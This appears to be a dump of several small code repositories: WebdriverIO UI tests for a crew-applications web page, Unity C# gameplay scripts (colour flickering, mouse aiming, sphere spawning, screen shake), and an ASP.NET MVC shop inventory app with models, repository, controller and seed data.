T-DevH/GoogleNet
ac1774013d03437da7f86064267d12c086f64124
2501154705eb574540bbef9ea87bf1acbd79bfdd
refs/heads/master
<repo_name>OlegSimfi/oos-automation<file_sep>/autotests/pages/main.page.js class MainPage { get mainPageTitle() {return $('//h1'); } get crewMembersArray() {return $$('.CrewMemeber-name'); } get nameInput() {return $('#name'); } get cityInput() {return $('#city'); } get submitButton() {return $('//button[@type="submit"]'); } get clearButton() {return $('//button[.="Clear"]'); } get appliedMembersArray() {return $$('//h2[.="Applied"]/following-sibling::div[@class="CrewMember-container"]'); } get interviewingMembersArray() {return $$('//h2[.="Interviewing"]/following-sibling::div[@class="CrewMember-container"]'); } get hiredMembersArray() {return $$('//h2[.="Hired"]/following-sibling::div[@class="CrewMember-container"]'); } get сrewMemberUpToInterviewingButtonsArray() {return $$('//h2[.="Applied"]/following-sibling::div[@class="CrewMember-container"]//button[@class="CrewMember-up"]'); } get сrewMemberUpToHiredButtonsArray() {return $$('//h2[.="Interviewing"]/following-sibling::div[@class="CrewMember-container"]//button[@class="CrewMember-up"]'); } } module.exports = new MainPage();<file_sep>/autotests/tests/workflowApliedInterviewingHired.js const MainPage = require('../pages/main.page'); let nemeUserForMoving; describe("Workflow move (Applied-Interviewing-Hired)", function () { it("Open Main page", function () { browser.url(''); MainPage.mainPageTitle.waitForExist(); const mainPageTitle = MainPage.mainPageTitle.getText(); expect(mainPageTitle).to.contain('OpenOceanStudio: Crew Applications'); }); it("Find quantity of Applied users and take user for workflow Moving", function () { const appliedUsersArrayBeforeWorkflowMoving = MainPage.appliedMembersArray; // Get array of Applied users before searching const amountOfappliedUsersBeforeWorkflowMoving = appliedUsersArrayBeforeWorkflowMoving.length; //Find amount of users (Array length) expect(amountOfappliedUsersBeforeWorkflowMoving).to.equal(4); //According to the test data, there can only be one user in the Interview 
column nemeUserForMoving = appliedUsersArrayBeforeWorkflowMoving[0].getAttribute('textContent').slice(0, - 1); }); it("Moving from Applied to Interviewing", function () { const moveUpButtonArray = MainPage.сrewMemberUpToInterviewingButtonsArray; const moveUpButton = moveUpButtonArray[0]; // Not the best solution, but fast. But then we will check that there is no error. In a real situation, we would take a more optimal solution with the developer. moveUpButton.click(); }); it("Check Moving from Applied to Interviewing", function () { const amountOfappliedUsersAfterWorkflowMoving = MainPage.appliedMembersArray.length; expect(amountOfappliedUsersAfterWorkflowMoving).to.equal(3); // Amount of remaining users const interviewingMembersArrayLenth = MainPage.interviewingMembersArray.length; expect(interviewingMembersArrayLenth).to.equal(1); //According to the test data, there can only be one user in the Interview column const nameOfUserInInterviewColumn = MainPage.interviewingMembersArray[0].getAttribute('textContent').slice(0, - 2); expect(nameOfUserInInterviewColumn).to.contain(nemeUserForMoving); }); it("Moving from Interviewing to Hired", function () { const moveUpButtonArray = MainPage.сrewMemberUpToHiredButtonsArray; const moveUpButton = moveUpButtonArray[0]; moveUpButton.click(); }); it("Check Moving from Interviewing to Hired", function () { const amountOfInterviewingUsersAfterWorkflowMoving = MainPage.interviewingMembersArray.length; expect(amountOfInterviewingUsersAfterWorkflowMoving).to.equal(0); // Amount of remaining users const hiredMembersArrayLenth = MainPage.hiredMembersArray.length; expect(hiredMembersArrayLenth).to.equal(2); //According to the test data, there can only be one user in the Interview column const nameOfUserInHiredColumn = MainPage.hiredMembersArray[1].getAttribute('textContent').slice(0, - 1); expect(nameOfUserInHiredColumn).to.contain(nemeUserForMoving); }); });<file_sep>/autotests/tests/searchUserByName.js const MainPage = 
require('../pages/main.page'); let crewMembersArrayBeforeSearching = new Array(); let amountOfcrewMembersArrayBeforeSearching; let nameOfUserForSearching; describe("Search User by Name", function () { it("Open Main page", function () { browser.url(''); MainPage.mainPageTitle.waitForExist(); const mainPageTitle = MainPage.mainPageTitle.getText(); expect(mainPageTitle).to.contain('OpenOceanStudio: Crew Applications'); }); it("Find quantity of users and take user for searching", function () { crewMembersArrayBeforeSearching = MainPage.crewMembersArray; // Get array of users before searching amountOfcrewMembersArrayBeforeSearching = crewMembersArrayBeforeSearching.length; //Find amount of users (Array length) const userForSearching = crewMembersArrayBeforeSearching[0].getAttribute('textContent'); // Select a user to searching nameOfUserForSearching = userForSearching.split(' ')[0]; // Because the search is carried out only by name (Maybe a bug?) }); it("Search User by Name", function () { MainPage.nameInput.setValue(nameOfUserForSearching); MainPage.submitButton.click(); }); it("Check search result", function () { const crewMembersArrayBeforeSearching = MainPage.crewMembersArray; const lenthOfcrewMembersArrayAfterSearching = crewMembersArrayBeforeSearching.length; expect(lenthOfcrewMembersArrayAfterSearching).to.equal(1); // According to the test data, there is only one user with this name const foundUserAfterSearching = crewMembersArrayBeforeSearching[0].getAttribute('textContent'); expect(foundUserAfterSearching).to.contain('<NAME>'); }); it("Check the working of the Clear button", function () { MainPage.clearButton.click(); const lenthOfcrewMembersArrayAfterClear = MainPage.crewMembersArray.length; expect(lenthOfcrewMembersArrayAfterClear).to.equal(amountOfcrewMembersArrayBeforeSearching); // The length of the array after cleaning should be equal to the length of the array before searching }); });
a25a990e20c90a311ae5bf5cebe2ede347b43e7e
[ "JavaScript" ]
3
JavaScript
OlegSimfi/oos-automation
04e60ab136466c42828fc1d36158ff5399bc5b62
f26b48fb73913c30749398f83adc280b7e4f7fb8
refs/heads/master
<file_sep>using System.Collections; using System.Collections.Generic; using UnityEngine; public class ColorFlickering : MonoBehaviour { public float switchTime = 0.1f; float counter = 0; public Material[] colors; MeshRenderer localRenderer; int currentInd = 0; private void Awake() { localRenderer = GetComponent<MeshRenderer>(); } private void Update() { counter += Time.deltaTime; if (counter > switchTime) { localRenderer.material = colors[Mathf.FloorToInt(currentInd / 1) % colors.Length]; currentInd++; counter -= switchTime; } } #region SPOILER //public MeshRenderer rend; //public Material[] mats; //int currentMat = 0; //// Update is called once per frame //void Update() //{ // rend.material = mats[currentMat % 6]; // currentMat++; //} #endregion } <file_sep>using System.Collections; using System.Collections.Generic; using UnityEngine; public class LookAtMouse : MonoBehaviour { public GameObject player; public Transform laserPrefab; public LayerMask raycastMask; Transform laserDot; private void Awake() { laserDot = Instantiate(laserPrefab, Vector3.zero, Quaternion.identity); } // Update is called once per frame void Update() { LaserPointer(); TurningPlayer(); } void TurningPlayer() { Vector3 lookVector = laserDot.position - player.transform.position; lookVector.y = 0; player.transform.rotation = Quaternion.LookRotation(lookVector); } void LaserPointer() { Vector3 mousePoint; RaycastHit hit; Physics.Raycast(Camera.main.ScreenPointToRay(Input.mousePosition), out hit, Mathf.Infinity, raycastMask); mousePoint = hit.point; laserDot.position = mousePoint; } } <file_sep>using System.Collections; using System.Collections.Generic; using UnityEngine; using UnityEngine.Events; using UnityEngine.UI; using TMPro; public class Flooder : MonoBehaviour { #region SPOILER public TextMeshProUGUI countText; public Vector3 centerPoint; public float distanceBetweenObjects; public int numberOfObjects = 1000; public float timeBetweenSpawns; public Transform sphere; [System.Serializable] 
public class OnSpawn : UnityEvent<bool> { }; public OnSpawn onSphereSpawn; //public UnityEvent OnSpawn; [Header("SFX")] public AudioSource SFX; public AudioClip spawnSound; public AudioClip pauseOn; public AudioClip pauseOff; [Header("Music")] public AudioSource Music; public bool pausedFlooding = false; private void Start() { StartCoroutine(ProgressiveFlood()); //Flood(); //StartCoroutine(startDelay(2f)); } void Flood() { int columns, rows; columns = Mathf.RoundToInt(Mathf.Sqrt(numberOfObjects)); rows = columns; Vector3 firstPoint = new Vector3(centerPoint.x - ((columns - 1) / 2), centerPoint.y, centerPoint.z + ((rows - 1) / 2)); int count = 0; for (int x = 0; x < columns && count <= numberOfObjects; x++) { for (int z = 0; z < rows && count <= numberOfObjects; z++) { Instantiate(sphere, firstPoint + (Vector3.right * x) + (Vector3.forward * z), Quaternion.identity); count++; } } } IEnumerator startDelay(float delay) { yield return new WaitForSeconds(delay); Flood(); } IEnumerator ProgressiveFlood() { int columns, rows; columns = Mathf.CeilToInt(Mathf.Sqrt(numberOfObjects)); rows = columns; Vector3 firstPoint = new Vector3(centerPoint.x - ((columns - 1) / 2), centerPoint.y, centerPoint.z + ((rows - 1) / 2)); int count = 0; for (int x = 0; x < columns && count < numberOfObjects; x++) { for (int z = 0; z < rows && count < numberOfObjects; z++) { Instantiate(sphere, firstPoint + (Vector3.right * x) + (Vector3.forward * z), Quaternion.identity); count++; SFX.PlayOneShot(spawnSound); bool isEven = (count % 2 == 0); onSphereSpawn.Invoke(isEven); countText.text = count.ToString(); do { yield return new WaitForSeconds(timeBetweenSpawns); } while (pausedFlooding); } } } public void ToggleFlooding() { pausedFlooding = !pausedFlooding; if (pausedFlooding) { Music.Pause(); SFX.PlayOneShot(pauseOn); } else { Music.Play(); SFX.PlayOneShot(pauseOff); } } public void SetRate(float newRate) { timeBetweenSpawns = newRate; } #endregion public void FunctionA() { } public void 
FunctionA(int x, float y) { } public void FunctionA(float x, int y) { } } <file_sep>using System.Collections; using System.Collections.Generic; using UnityEngine; public class ScreenShake : MonoBehaviour { public AnimationCurve magnitudeCurve; public float shakeDuration; public float shakeMagnitude; public void ShakeCamera() { StartCoroutine(Shake(shakeDuration, shakeMagnitude)); } public IEnumerator Shake(float duration, float magnitude) { Vector3 orignalPosition = transform.localPosition; Transform parentObject = transform.parent; float elapsed = 0f; float inverseLerp; while (elapsed < duration) { inverseLerp = Mathf.InverseLerp(0, duration, elapsed); float x = Random.Range(-1f, 1f) * (magnitude * magnitudeCurve.Evaluate(inverseLerp)); float y = Random.Range(-1f, 1f) * (magnitude * magnitudeCurve.Evaluate(inverseLerp)); transform.localPosition = orignalPosition + new Vector3(x, y, 0); elapsed += Time.deltaTime; yield return 0; } transform.parent = parentObject; transform.localPosition = orignalPosition; } }
d993a5e354abb4333d5056d65ea0f9cd01879f3f
[ "C#" ]
4
C#
jgonzale5/OptimizationDemo
7ba04277f67eb28a77f22e0082ef30d592262037
0c8da7fa25bf3061fb109a8945547df9b4519d61
refs/heads/master
<repo_name>Keuthonymous/Shop-MVC<file_sep>/MVCShop/Repositories/ItemRepository.cs using MVCShop.DataAccess; using MVCShop.Models; using System; using System.Collections.Generic; using System.Linq; using System.Web; using System.Web.Helpers; using PagedList.Mvc; using PagedList; namespace MVCShop.Repositories { public class ItemRepository { StoreContext context = new StoreContext(); public object StoreContext { get; internal set; } public IEnumerable<StockItem> GetAllItems() { return context.Items.ToList(); } //public void AddNewItem(StockItem item) //{ // if (CheckShelfPosition(item) == false) // { // context.Items.Add(item); // context.SaveChanges(); // } //} public void RemoveItem(StockItem item) { context.Items.Remove(item); context.SaveChanges(); } public StockItem DetailsByArtNum(int? ArtNum) { return context.Items.SingleOrDefault(item => item.ArticleNumber == ArtNum); } public List<StockItem> GetByArtNum(int[] deleteInputs) { var query = (from i in context.Items where deleteInputs.Contains(i.ArticleNumber) select i).ToList(); return query; } public IEnumerable<StockItem> SearchByPriceOrName(string searchTerm = null) { var query = from i in context.Items where searchTerm == null || i.Name.StartsWith(searchTerm) orderby i.ArticleNumber select i; return query; } public void Edit(StockItem item) { context.Entry(item).State = System.Data.Entity.EntityState.Modified; context.SaveChanges(); } } }<file_sep>/MVCShop/Models/StockShelf.cs using System; using System.Collections.Generic; using System.ComponentModel.DataAnnotations; using System.Linq; using System.Web; namespace MVCShop.Models { public class StockShelf { [Key] public int ID { get; set; } [Required] public string ShelfName { get; set; } public virtual ICollection<StockItem> StockItems { get; set; } } }<file_sep>/MVCShop/Controllers/StockItemController.cs using MVCShop.Models; using MVCShop.Repositories; using System; using System.Collections.Generic; using System.Linq; using System.Net; using System.Web; 
using System.Web.Mvc; using PagedList; namespace MVCShop.Controllers { public class StockItemController : Controller { private ItemRepository repo; public StockItemController() { repo = new ItemRepository(); } public ActionResult Autocomplete(string term) { var AutocompleteList = repo.GetAllItems(); var query = (from i in AutocompleteList where i.Name.StartsWith(term) select new { label = i.Name }).Take(10); return Json(query, JsonRequestBehavior.AllowGet); } // GET: StockItem public ActionResult Index(string searchTerm = null) { if (Request.IsAjaxRequest()) { return PartialView("_Items", repo.SearchByPriceOrName(searchTerm)); } return View(repo.SearchByPriceOrName(searchTerm)); } public ActionResult Details(int id) { return View(repo.DetailsByArtNum(id)); } [HttpGet] public ActionResult Delete(int? id) { if (id == null) { return new HttpStatusCodeResult(HttpStatusCode.BadRequest); } StockItem item = repo.DetailsByArtNum(id); if (id == null) { return HttpNotFound(); } return View(item); } [HttpPost, ActionName("Delete")] public ActionResult DeleteConfirmation(int id) { StockItem item = repo.DetailsByArtNum(id); repo.RemoveItem(item); return RedirectToAction("Index"); } [HttpGet] public ActionResult DeleteSelected(int[] deleteInputs) { if (deleteInputs == null) { return new HttpStatusCodeResult(HttpStatusCode.BadRequest); } List<StockItem> removeList = repo.GetByArtNum(deleteInputs); if (deleteInputs == null) { return HttpNotFound(); } return View(removeList); } [HttpPost, ActionName("DeleteSelected")] public ActionResult DeleteSelectedConfirm(int[] deleteInputs) { List<StockItem> removeList = repo.GetByArtNum(deleteInputs); if (removeList != null) { foreach (var item in removeList) { repo.RemoveItem(item); } } return RedirectToAction("Index"); } [HttpGet] public ActionResult Create() { return View(); } //[HttpPost] //public ActionResult Create([Bind(Include = "ArticleNumber, Name, Price, ShelfPosition, Quantity, Description")] StockItem item) //{ // if 
(ModelState.IsValid && repo.CheckShelfPosition(item) == false) // { // repo.AddNewItem(item); // return RedirectToAction("Index"); // } // return View(item); //} [HttpGet] public ActionResult Edit(int? id) { if (id == null) { return new HttpStatusCodeResult(HttpStatusCode.BadRequest); } StockItem item = repo.DetailsByArtNum(id); if (item == null) { return HttpNotFound(); } return View(item); } [HttpPost] public ActionResult Edit([Bind(Include = "ArticleNumber, Name, Price, ShelfPosition, Quantity, Description")] StockItem item) { if (ModelState.IsValid) { repo.Edit(item); return RedirectToAction("Index"); } return View(item); } } }<file_sep>/MVCShop/Models/StockItem.cs using System; using System.Collections.Generic; using System.Linq; using System.Web; using System.ComponentModel.DataAnnotations; using System.ComponentModel.DataAnnotations.Schema; namespace MVCShop.Models { public class StockItem { [Key] public int ArticleNumber { get; set; } [Required] [StringLength(1024)] public string Name { get; set; } [Range (0.1,100000)] public double Price { get; set; } public int Quantity { get; set; } [Required] [StringLength(140)] public string ItemDescription { get; set; } public virtual ICollection<Category> Categories { get; set; } [ForeignKey("StockShelf")] public int StockShelfID { get; set; } public virtual StockShelf StockShelf { get; set; } } }<file_sep>/MVCShop/Migrations/Configuration.cs namespace MVCShop.Migrations { using MVCShop.Models; using System; using System.Data.Entity; using System.Data.Entity.Migrations; using System.Linq; internal sealed class Configuration : DbMigrationsConfiguration<MVCShop.DataAccess.StoreContext> { public Configuration() { AutomaticMigrationsEnabled = true; } protected override void Seed(MVCShop.DataAccess.StoreContext context) { context.Items.AddOrUpdate( i => i.ArticleNumber, new StockItem { ArticleNumber = 1234, Name = "Monster", Price = 20.99, Quantity = 2 }, new StockItem { ArticleNumber = 1334, Name = "RedBull", Price = 
16.99, Quantity = 3 }, new StockItem { ArticleNumber = 1434, Name = "Logitech G502 Proteus Spectrum", Price = 949.99, Quantity = 1 }, new StockItem { ArticleNumber = 1534, Name = "SteelSeries G6 V2", Price = 599.99, Quantity = 1 } ); context.Categories.AddOrUpdate( c => c.ID, new Category { Name = "Food", IsAgeRestricted = false, CatDescription = "This is food" }, new Category { Name = "Alcohol", IsAgeRestricted = true, CatDescription = "This is booze" }, new Category { Name = "Electronics", IsAgeRestricted = false, CatDescription = "These are fun things" } ); context.Shelves.AddOrUpdate( s => s.ID, new StockShelf { ShelfName = "A1" }, new StockShelf { ShelfName = "A2" }, new StockShelf { ShelfName = "A3" } ); } } }
c0a99318d3f33b549b64c7909bf60efad1e80631
[ "C#" ]
5
C#
Keuthonymous/Shop-MVC
cb18f9a6dc2216cde8e8ceb26507248387d45b64
87d8e3b0f81f0d78d0e2ad389feaf9434663dd8b
refs/heads/master
<file_sep>package ca.ualberta.cs.lonelytwitter; public class Tweet { private String tweet; private String date; public Tweet(String tweet, String date) { this.tweet = tweet; this.date = date; } }
4c992bd678c1676c4c9ca57f755ea5504839a817
[ "Java" ]
1
Java
tchang2/lonelyTwitter
8b76aa2be6ddcf8188ff7e7eb2ca6f731bd9b817
032b1e255d66dec515f39a2dc6599ca46e61e1d4
refs/heads/master
<file_sep>/* 1) Object.values() : we can access the values of an object by looping through the keys and then dynamically accessing the keys. This works if you need to access both the keys and the values. However, if you only need to access the values, then you can use Object.values() which returns an array of the values: */ const user = { id: 1, name: "<NAME>", age: 22 }; const values = Object.values(user); console.log(values); // [1, "<NAME>", 22] /* 2) Object.entries() : The Object.entries() method returns an array of arrays representing every key/value pair. Let's visualize it: */ const user = { id: 1, name: "<NAME>", age: 22 }; const entries = Object.entries(user); //The entries variable will return the following array of arrays: [ ["id", 1], ["name", "<NAME>"], ["age", 22] ] // This is especially useful in combination with for..in and array destructuring.
55ddbe37f410e30da71707cd4980e08d23e17ccf
[ "JavaScript" ]
1
JavaScript
navinojha/msk-javascript-bootcamp
5fab85d3ec62e4f84e97290c74cfc95b3e1b94c7
36587ac4cdc6cdaa4dcb8179d5ebacc80f7beea3
refs/heads/master
<repo_name>yb66/Captchachacha<file_sep>/spec/captchachacha_spec.rb require 'rspec' require 'rack/test' require 'rack/mock' require 'curb' require 'webmock/rspec' require 'securerandom' require_relative '../lib/rack/captchachacha.rb' describe "Rack::Captchachacha" do include Rack::Test::Methods before do WebMock.reset! WebMock.disable_net_connect! end def app main_app = lambda { |env| request = Rack::Request.new(env) return_code, body_text = case request.path when '/' then [200,'Hello world'] when '/login' if request.post? env['X-Captcha-Valid'] ? [200, 'post login'] : [200, 'post fail'] else [200,'login'] end else [404,'Nothing here'] end [return_code,{'Content-type' => 'text/plain'}, [body_text]] } builder = Rack::Builder.new builder.use Rack::Captchachacha builder.run main_app builder.to_app end context "basic request" do it "is a 200 ok response code" do get("/") last_response.status == 200 end it "should say hello" do get("/") last_response.body == "Hello world" end end # context context "a page that requires a captcha" do let(:session_id){ SecureRandom.random_number.to_s[2..-1] } let(:url_to_request) { "#{Rack::Captchachacha::VERIFY_URL}/#{session_id}/response" } it "should pass the captcha" do stub_request(:get, url_to_request).to_return({:body => "1"}) post "/login", {'captcha_session' => session_id, 'captcha' => 'response'} WebMock.should have_requested(:get, url_to_request) last_response.status.should == 200 last_response.body.should == 'post login' end it "should fail the captcha" do stub_request(:get, url_to_request).to_return({:body => "0"}) post "/login", {'captcha_session' => session_id, 'captcha' => 'response'} WebMock.should have_requested(:get, url_to_request) last_response.status.should == 200 last_response.body.should == 'post fail' end end # context end <file_sep>/Rakefile require 'rake' require 'rspec/core/rake_task' RSpec::Core::RakeTask.new(:spec) do |spec| spec.pattern = 'spec/*_spec.rb' spec.rspec_opts = ['-cf nested'] end task :default => 
:spec <file_sep>/lib/rack/captchachacha.rb # encoding: utf-8 require_relative './captchachacha/helpers.rb' module Rack class Captchachacha VERIFY_URL = "http://captchator.com/captcha/check_answer" CHALLENGE_FIELD = 'captcha_session' RESPONSE_FIELD = 'captcha' DEFAULT_MESSAGE = "Incorrect response, please try again." RESULT_HEADER = 'X-Captcha-Valid' RESULT_MESSAGE = 'X-Captcha-Msg' # @param app Rack application # @param [optional,Hash] options Hash of options # @option options [String, Array<String>] paths Where user goes to login or access the captcha. def initialize( app, options={} ) @app = app # this is here because it's in the Rack::Recaptcha API, I've no idea what it does really. @paths = options[:paths] && [options[:paths]].flatten.compact end def call(env) dup._call env end # @param env Rack environment def _call(env) request = Request.new(env) if request.params[CHALLENGE_FIELD] && request.params[RESPONSE_FIELD] result, msg = verify( request.params[CHALLENGE_FIELD].to_i, request.params[RESPONSE_FIELD] ) # captchator doesn't give an error message, but in the spirit of keeping a similar API # to reCAPTCHA, and because it's an easy place to stick a default error message, I'll # pretend that `verify` returns two results. # If it's a fail then the usual course of action would be to redirect back to the # captcha form, but on success to continue, so the error message will be ignored unless # of failure. msg ||= DEFAULT_MESSAGE env.merge!(RESULT_HEADER => result == true, RESULT_MESSAGE => msg ) end @app.call(env) end def verify( session_id, answer ) return false if session_id == 0 || session_id.nil? return false if answer.nil? 
require 'curb' Curl::Easy.perform("#{VERIFY_URL}/#{session_id}/#{answer}").body_str == "1" end # def end # class end # Rack<file_sep>/captchachacha.gemspec # -*- encoding: utf-8 -*- lib = File.expand_path('./lib') $:.unshift lib unless $:.include?(lib) require 'rack/captchachacha/version' Gem::Specification.new do |s| s.name = "captchachacha" s.summary = "Captchator for rack with helpers for sinatra" s.description = <<-EOF Captchator as Rack middleware, and helpers for sinatra. EOF s.version = Rack::Captchachacha::VERSION s.platform = Gem::Platform::RUBY s.require_path = "lib" s.required_ruby_version = ">= 1.9.2" s.authors = ["<NAME>"] s.files = `git ls-files`.split("\n") s.add_dependency("rack", "~> 1.3.0") s.add_dependency("curb", "~> 0.7.15") s.email = ["iainspeed <EMAIL>@ <EMAIL>"] s.homepage = "https://github.com/yb66/Captchachacha" s.test_files = `git ls-files -- {test,spec,features}`.split("\n") s.signing_key = ENV['HOME'] + '/.ssh/gem-private_key.pem' s.cert_chain = [ENV['HOME'] + '/.ssh/gem-public_cert.pem'] end <file_sep>/lib/rack/captchachacha/helpers.rb # encoding: utf-8 # @author <NAME> # # A module to take advantage of the http://captchator.com service module Rack class Captchachacha module Helpers require 'securerandom' def captcha_valid? request.env['X-Captcha-Valid'] end # def def captcha_session @captcha_session ||= SecureRandom.random_number.to_s[2..-1] end def captcha_answer_tag %Q!<input id="captcha_answer" name="captcha_answer" type="text" size="6"/>! end def captcha_image_tag %Q!<input id="captcha_session" name="captcha_session" type="hidden" value="#{captcha_session}"/><img id="captcha_image" src="http://captchator.com/captcha/image/#{captcha_session}"/>! end end # Helpers end # Captchachacha end # Rack
166d634289d8d9155274aae2d2dbb213d6a83275
[ "Ruby" ]
5
Ruby
yb66/Captchachacha
cf5b3c11d02a4dee75b00f04150c066b827ddd15
9846630db02797f7c32112f0c963de8611ddbb3a
refs/heads/master
<file_sep>$(document).ready(function() { let checkMonthValue = /^\d+$/; //MONTH VALIDATION $.validator.addMethod('validMonth', function(value, element) { let zeroPosition = value.indexOf('0') == 0; if (value >= 10 && value <= 12) { zeroPosition = value; } else if (value < 10) { zeroPosition = value.indexOf('0') == 0; } return value.length == 2 && checkMonthValue.test(value) && zeroPosition; }, 'Please enter a valid month.'); //YEAR VALIDATION $.validator.addMethod('validYear', function(value, element) { if (value >= 10 && value <= 99) { return value.length == 2 && checkMonthValue.test(value); } }, 'Please enter a valid year.'); $("#donation-form").validate({ rules: { month: { required: true, validMonth: true }, year: { required: true, validYear: true }, }, messages: { month: { required: "Please enter the expiration month." }, year: { required: "Please enter the expiration year." }, }, highlight: function(messages) { $('messages').addClass('error'); }, }); }); <file_sep>### jQuery Validation Exercise **Technologies used:** JavaScript, jQuery **Goal:** To create a form consisting of two fields and a submit button which represent the credit card payment section of an online transaction. The first field and second field represent the expiration month and expiration year, respectively. The following jQuery validation plugin was used <https://jqueryvalidation.org/>. If the user tries to submit an empty form, the user would be prompted with messages to fill them out. <img src="demo_blank_form.gif"> If the user incorrectly fills out the form, a message will prompt the user to input a valid month. ​ <img src="demo_error.gif"> If the information has been correctly entered, the form will be submitted. <img src="demo_submit.gif">
0e1dddc57239c74fe345ce0d6c5068e3e00b8c7d
[ "JavaScript", "Markdown" ]
2
JavaScript
LauraSchneider/jquery-challenge
4ab19a55317ff1d501e41ef487647b9cdab434c8
74ae95e8f47e58d16ce940e18fb0dfe39838960c
refs/heads/master
<file_sep>import difflib file_1=open('/Users/wangyifan/Desktop/Bert_v2_2(upper_case).ipynb','r',encoding='utf-8').readlines() file_2=open('/Users/wangyifan/Desktop/bert_v2_0(lowest_loss).ipynb','r',encoding='utf-8').readlines() d=difflib.HtmlDiff() results=d.make_file(file_1,file_2) # 返回HTML形式的比较字符串 with open('results.html','w') as file: file.write(results) # 将比较结果保存在results.html文件中<file_sep># Google-BERT-on-fake_or_real-news-dataset **Description**: Use Google BERT on fake_or_real news dataset with best f1 score: 0.986 Table of Contents ================= * [Google-BERT-on-fake_or_real-news-dataset](#google-bert-on-fake_or_real-news-dataset) * [Showcase](#showcase) * [1. Pipeline](#1-pipeline) * [2. Part1: Data processing](#2-part1-data-processing) * [3. Part2: Bert Model](#3-part2-bert-model) * [4. Part3: Result](#4-part3-result) * [5. Part4: Reference](#5-part4-reference) * [Implementation](#implementation) * [1. Preparation](#1-preparation) * [1.1 Set parameters and install and load required package](#11-set-parameters-and-install-and-load-required-package) * [1.2 Set tokenizer](#12-set-tokenizer) * [1.3 Define Bert Config](#13-define-bert-config) * [2. Dataset Processing](#2-dataset-processing) * [2.1 Read the data and convert label into binary text](#21-read-the-data-and-convert-label-into-binary-text) * [2.2 Combine the title and text](#22-combine-the-title-and-text) * [2.3 Use regular expression to drop non-sentence](#23-use-regular-expression-to-drop-non-sentence) * [2.4 Use EDA method to augment the text](#24-use-eda-method-to-augment-the-text) * [3. Google Bert](#3-google-bert) * [3.1 Create data dictionary](#31-create-data-dictionary) * [3.2 Define the train model](#32-define-the-train-model) * [4. Final output](#4-final-output) * [4.1 Model details](#41-model-details) * [4.2 F1 and other details](#42-f1-and-other-details) # Showcase ## 1. 
Pipeline ![Pipeline](https://i.loli.net/2019/08/23/P8Seo5EvmpZfAOT.png) First, we got the raw text with title, text and label. Then we use some methods of data processing to operate the text. After the data processing, we put them into the Bert model to train the data, which includes the Bert itself and the Classifier, here I used the feed-forward neural network and add a softmax layer to normalize the output. In the end, we got the predication and other details. ## 2. Part1: Data processing (1) **Drop non-sentence** • Type1: http[s]://www.claritypress.com/LendmanIII.html • Type2: [email protected] • Type3: @EP_President #EP_President • Type4: **Want FOX News First * in your inbox every day? Sign up here.** • Type5: ☮️ 💚 🌍 etc (2) **EDA methods** • Insert word by BERT similarity (Random Insertion) • Substitute word by BERT similarity (Synonym Replacement) AS for the first part, I use two methods: drop non-sentence and some EDA methods. I read some text within the fake_or_real news and I find that it contains various type of non-sentence, so I use the regular expression to drop them. And then, I use random insertion and synonym replacement to augment the text. ## 3. Part2: Bert Model ![Bert model](https://i.loli.net/2019/08/23/pFv1K86WUcafyDI.png) As for the second part, we put the text which we got from the first part into the bert model. The Bert model uses 12 encode layers and finally classifier to get the output. ## 4. Part3: Result ![Result](https://i.loli.net/2019/08/23/aGTYdfz2cul1pj3.png) In the end, we combine different methods of data processing and u can see the f1 score from the chart. We get the best f1 score(0.986) from Cased text + drop sentence. ## 5. 
Part4: Reference (1) **EDA**: •Knowledge: https://towardsdatascience.com/these-are-the-easiest-data-augmentation-techniques-in-natural-language-processing-you-can-think-of-88e393fd610 •Implemenation: https://github.com/makcedward/nlpaug (2) **Can’t remove stopwords**: •Deeper Text Understanding for IR with Contextual NeuralLanguage Modeling: https://arxiv.org/pdf/1905.09217 •Understanding the Behaviors of BERT in Ranking : https://arxiv.org/pdf/1904.07531 (3) **Bert by Pytorch**: •https://pytorch.org/hub/huggingface_pytorch-pretrained-bert_bert/ (4) **Bert Demo**: https://github.com/sugi-chan/custom_bert_pipeline (5) **Dataset**: https://cbmm.mit.edu/sites/default/files/publications/fake-news-paper-NIPS.pdf I learn the EDA from the two web site and through two articles, I learn that we shouldn’t remove Stopwords which otherwise will destroy the context of sentence. The end is implementation of BERT with Pytorch and the Bert model I learned. # Implementation ## 1. Preparation ### 1.1 Set parameters and install and load required package ```Python ## parameters Setting par_cased = 0 # default cased, 0 means uncased par_cleanup = 1 # default cleanup, 0 means non-cleanup par_eda = 0 # default eda, 0 means non-eda pip install pytorch_pretrained_bert nlpaug bert matplotlib sklearn librosa SoundFile nltk pandas from __future__ import print_function, division import torch import torch.nn as nn import torch.optim as optim from torch.optim import lr_scheduler import numpy as np import torchvision from torchvision import datasets, models, transforms import matplotlib.pyplot as plt import time import os import copy from torch.utils.data import Dataset, DataLoader from PIL import Image from random import randrange import torch.nn.functional as F from sklearn.metrics import roc_curve, auc import nlpaug.augmenter.char as nac #import nlpaug.augmenter.word as naw import nlpaug.flow as naf from nlpaug.util import Action ``` ### 1.2 Set tokenizer ```Python import torch from 
pytorch_pretrained_bert import BertTokenizer, BertModel, BertForMaskedLM # OPTIONAL: if you want to have more information on what's happening, activate the logger as follows import logging logging.basicConfig(level=logging.INFO) # Load pre-trained model tokenizer (vocabulary) if par_cased ==1: tokenizer = BertTokenizer.from_pretrained('bert-base-cased') else: tokenizer = BertTokenizer.from_pretrained('bert-base-uncased') ``` ### 1.3 Define Bert Config ```Python class BertLayerNorm(nn.Module): def __init__(self, hidden_size, eps=1e-12): """Construct a layernorm module in the TF style (epsilon inside the square root). """ super(BertLayerNorm, self).__init__() self.weight = nn.Parameter(torch.ones(hidden_size)) self.bias = nn.Parameter(torch.zeros(hidden_size)) self.variance_epsilon = eps def forward(self, x): u = x.mean(-1, keepdim=True) s = (x - u).pow(2).mean(-1, keepdim=True) x = (x - u) / torch.sqrt(s + self.variance_epsilon) return self.weight * x + self.bias class BertForSequenceClassification(nn.Module): """BERT model for classification. This module is composed of the BERT model with a linear layer on top of the pooled output. Params: `config`: a BertConfig class instance with the configuration to build a new model. `num_labels`: the number of classes for the classifier. Default = 2. Inputs: `input_ids`: a torch.LongTensor of shape [batch_size, sequence_length] with the word token indices in the vocabulary. Items in the batch should begin with the special "CLS" token. (see the tokens preprocessing logic in the scripts `extract_features.py`, `run_classifier.py` and `run_squad.py`) `token_type_ids`: an optional torch.LongTensor of shape [batch_size, sequence_length] with the token types indices selected in [0, 1]. Type 0 corresponds to a `sentence A` and type 1 corresponds to a `sentence B` token (see BERT paper for more details). `attention_mask`: an optional torch.LongTensor of shape [batch_size, sequence_length] with indices selected in [0, 1]. 
